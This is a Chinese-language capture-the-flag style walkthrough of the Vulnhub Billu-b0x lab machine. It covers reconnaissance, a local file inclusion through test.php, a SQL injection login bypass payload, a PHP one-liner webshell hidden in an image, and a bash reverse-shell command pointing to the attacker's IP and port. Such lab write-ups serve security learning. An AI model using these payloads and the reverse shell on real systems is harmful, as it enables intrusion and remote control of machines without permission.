当前位置: 首页 > news >正文

vulhub-Billu-b0x攻略

靶场下载链接

https://download.vulnhub.com/billu/Billu_b0x.zip

 将kali和Billu,NAT连接

获取靶场ip

arp-scan -l

 使用diesearch进行目录扫描

dirsearch  -u "  "

 查看目录中的信息

打开add.php

 打开head.php

 打开in,phpinfo()的信息泄露

允许本地文件包含 

 打开index.php,登录界面,尝试使用万能密码登录(失败)

' or 1=1# 

 打开phpmy

 打开test.php

使用get请求失败 

在kali,使用post请求成功 

 

存在文件包含漏洞和文件下载漏洞

使用此请求方式查看一下index.php

发现了登录的逻辑,明白了为什么万能密码会错误

只要在万能密码的后面加一个\就可以了

打开images,图片上传位置

登录 

' or 1=1#\ 

成功登录 

show users 显示用户信息,重点有图片 

获取到图片上传的路径 

右键点击图片,选择在新标签中打开图像

 add 添加用户,上传图片

 图片马

 新建1.php文件写入一句话木马

 随便下载一个图片,放在一起

copy 1.png/b + 1.php/a 2.png

将制作好的图片马上传上去 

图片马地址http://192.168.31.138/uploaded_images/2.png 

 制作反弹shell木马文件

show users 点击continue时进行抓包

echo "bash -i >& /dev/tcp/192.168.31.138/8888 0>&1" | bash

将load改为图片马位置,在panel.php后放代码 

在kali中监听8888端口

发送到重放器,点击发送,kali中可监听到shell,反弹shell完成

相关文章:

  • DevOps工具链
  • 【c++】内存序 和 内存一致性模型
  • HAL库实现SPI读写FLASH(W25Q32)
  • 组合Composition(has-a)
  • python日期
  • [Mysql]创建数据库基础
  • Rocky Linux 9.x 基于 kubeadm部署k8s 1.32
  • 【H2O2 | 软件开发】前端深拷贝的实现
  • 基于javaweb的SpringBoot公司日常考勤系统设计与实现(源码+文档+部署讲解)
  • CMake基础之-控制流
  • 【备赛】遇到的小问题-1
  • 施磊老师高级c++(一)
  • 8. Merge Sorted Array
  • 【C++基础】CMake项目
  • 使用 Spring 的 FactoryBean 创建和获取 Bean 对象
  • 将 VOC 格式 XML 转换为 YOLO 格式 TXT
  • 数据结构 -- 二叉树的存储结构
  • 使用python seaborn创建配对图:从核心概念到实战案例
  • 跨系统投屏:Realme手机(远程)投屏到Linux系统的简单方法
  • winx64 安装对应版本火狐浏览器驱动
  • 祝贺!苏翊鸣成功解锁“2160”
  • 重庆荣昌出圈背后:把网络流量变成经济发展的增量
  • 全国人大常委会启动食品安全法执法检查
  • 欧洲承诺投资6亿欧元吸引外国科学家
  • 水利部:山西、陕西等地旱情将持续
  • 咖啡戏剧节举办第五年,上生新所“无店不咖啡,空间皆可戏”